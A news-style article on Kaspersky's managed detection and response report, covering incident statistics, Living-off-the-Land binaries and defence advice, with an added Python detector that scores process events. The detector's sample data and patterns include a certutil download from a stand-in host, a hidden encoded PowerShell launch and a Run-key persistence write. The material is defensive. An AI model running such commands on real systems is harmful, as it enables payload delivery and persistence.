Recently, a cybersecurity firm revealed that the share of critical incidents experienced by organizations increased from one in ten (9%) in 2020 to one in seven (14%) in 2021.
Organizations across all industries had high-severity incidents between 2021 and 2022, with most verticals experiencing multiple types. According to Kaspersky’s Managed Detection and Response (MDR) report, the most frequent causes of critical incidents remained the same as the previous year, with targeted attacks accounting for the biggest share (40.7 percent). Malware with a critical impact was found in 14 percent of cases, and a little less than 13 percent of high-severity incidents were classified as exploiting publicly exposed critical cybersecurity vulnerabilities. Social engineering was also a significant threat, accounting for over 5.5 percent of all incidents.
Targeted attacks were detected in every vertical covered by the research in 2021, with the exception of education and mass media; incidents of targeted attacks were, however, recorded within media organizations. The government, industrial, IT, and financial verticals had the highest number of human-driven attacks.
High-severity incidents are distinguished by the widespread use of non-malicious Living-off-the-Land (LotL) binaries that are already present in a targeted system. These tools enable attackers to conceal their activities and reduce the likelihood of being identified during the initial stages of a cyberattack. Alongside the widely used rundll32.exe, powershell.exe and cmd.exe, built-in tools such as reg.exe, te.exe, and certutil.exe are frequently used in critical incidents. Organizations can use services that conduct ethical offensive exercises to better prepare themselves against targeted attacks. This activity involves simulating complex adversarial attacks in order to assess a company’s cyber-resilience. According to Kaspersky’s MDR analysts, such exercises were used by only 16 percent of enterprises.
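The point about LotL binaries is that the executable itself is legitimate, so detection has to rest on context: who launched it and with what arguments. The following is an added example (not code from the Kaspersky report or its MDR service) that scores constructed Sysmon-style process-creation events for the binaries named above. The parent-process list, the command-line heuristics and their weights, and the triage threshold are all assumptions chosen for illustration; a real deployment would tune them against its own baseline.

```python
"""Score Living-off-the-Land (LotL) binary use in process-creation telemetry.

Added example, not part of the original article. The heuristics below are
assumptions for illustration, not rules published by Kaspersky.
"""
import re
from dataclasses import dataclass

# LotL binaries named in the article (te.exe is included as listed there).
LOTL_BINARIES = {"rundll32.exe", "powershell.exe", "cmd.exe",
                 "reg.exe", "te.exe", "certutil.exe"}

# Parents that rarely have a legitimate reason to spawn LotL binaries (assumed list).
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "wscript.exe"}

# Command-line heuristics with weights (assumed): (pattern, weight, label).
SUSPICIOUS_ARGS = [
    (re.compile(r"\s-(enc|encodedcommand)\b", re.I), 3, "encoded PowerShell command"),
    (re.compile(r"\burlcache\b.*\bhttps?://", re.I), 3, "certutil fetching a URL"),
    (re.compile(r"\badd\b.*\\CurrentVersion\\Run\b", re.I), 2, "Run key persistence write"),
]


@dataclass
class ProcessEvent:
    """Minimal Sysmon-like event: ParentImage, Image, CommandLine."""
    parent: str
    image: str
    cmdline: str


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return (score, reasons). A score of 0 means no LotL signal at all."""
    name = _basename(ev.image)
    if name not in LOTL_BINARIES:
        return 0, []
    score, reasons = 0, []
    parent = _basename(ev.parent)
    if parent in SUSPICIOUS_PARENTS:
        score += 2
        reasons.append(f"{name} spawned by {parent}")
    for pattern, weight, label in SUSPICIOUS_ARGS:
        if pattern.search(ev.cmdline):
            score += weight
            reasons.append(label)
    return score, reasons


def triage(events, threshold=3):
    """Return (score, event, reasons) for events at or above threshold, highest first."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((score, ev, reasons))
    hits.sort(key=lambda hit: hit[0], reverse=True)
    return hits


# Constructed sample telemetry; paths and arguments are illustrative only.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
                 "cmd.exe /c dir"),
    ProcessEvent(r"C:\Program Files\Microsoft Office\winword.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -enc AAAA"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -urlcache -split -f http://example.invalid/x.txt C:\Users\Public\x.txt"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\reg.exe",
                 r"reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /d C:\Users\Public\u.exe"),
    ProcessEvent(r"C:\Windows\System32\services.exe", r"C:\Windows\System32\rundll32.exe",
                 "rundll32.exe shell32.dll,Control_RunDLL"),
]

if __name__ == "__main__":
    for score, ev, reasons in triage(SAMPLE_EVENTS):
        print(f"[{score}] {_basename(ev.image)} <- {_basename(ev.parent)}: {'; '.join(reasons)}")
```

With the assumed weights, the Office-spawned encoded PowerShell and the certutil URL fetch cross the threshold, while the plain `cmd.exe /c dir` and the service-launched rundll32 score zero. The Run-key write scores 2 and is deliberately left below the threshold on its own: a single low-confidence signal is the kind of event an analyst would want correlated with others rather than raised as an alert, which is the triage role the MDR section below describes.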
Working of MDR
MDR remotely monitors, detects, and responds to cybersecurity threats within your workplace. Visibility into security events on the endpoint is provided by an Endpoint Detection and Response (EDR) tool. Relevant threat information, advanced analytics, and forensic data are passed to human analysts, who triage the alerts and determine the appropriate response to minimize the impact and risk of confirmed (true-positive) incidents.
Finally, the threat is eradicated and the impacted endpoint is restored to its pre-infected state using a combination of human and machine capabilities.
Some of the core capabilities of an MDR are prioritization, threat hunting, investigation, guided response, and remediation.
Defending Against High-severity Cybersecurity Incidents
The following are some of Kaspersky’s recommendations for defending against advanced cyberattacks:
* Implement a solution that combines detection and response capabilities with managed threat hunting to help identify both known and unknown threats without requiring additional in-house resources. For reacting to modern threats, an alert-driven approach is no longer effective.
* To ensure in-depth visibility into cyber threats targeting the organization, provide the SOC teams with access to the latest threat intelligence.
* To strengthen the expertise of your in-house digital forensics and incident response team, implement expert Incident Response training. This will make it easier to verify and handle threats swiftly, as well as reduce the incident impact.
* Provide personnel with essential cybersecurity expertise to reduce the possibility of targeted attacks. Even in high-severity incidents, social engineering is still often used.
Sergey Soldatov, Head of Security Operations Center, Kaspersky, said: “The MDR report once again shows that sophisticated attacks are here to stay, and more and more organizations are facing critical incidents. Last year, Kaspersky analysts managed to reduce this indicator from 52.6 minutes in 2020 to 41.4 minutes. This was achieved by adding more incident card templates, and the introduction of new telemetry enrichments that speed up triage.”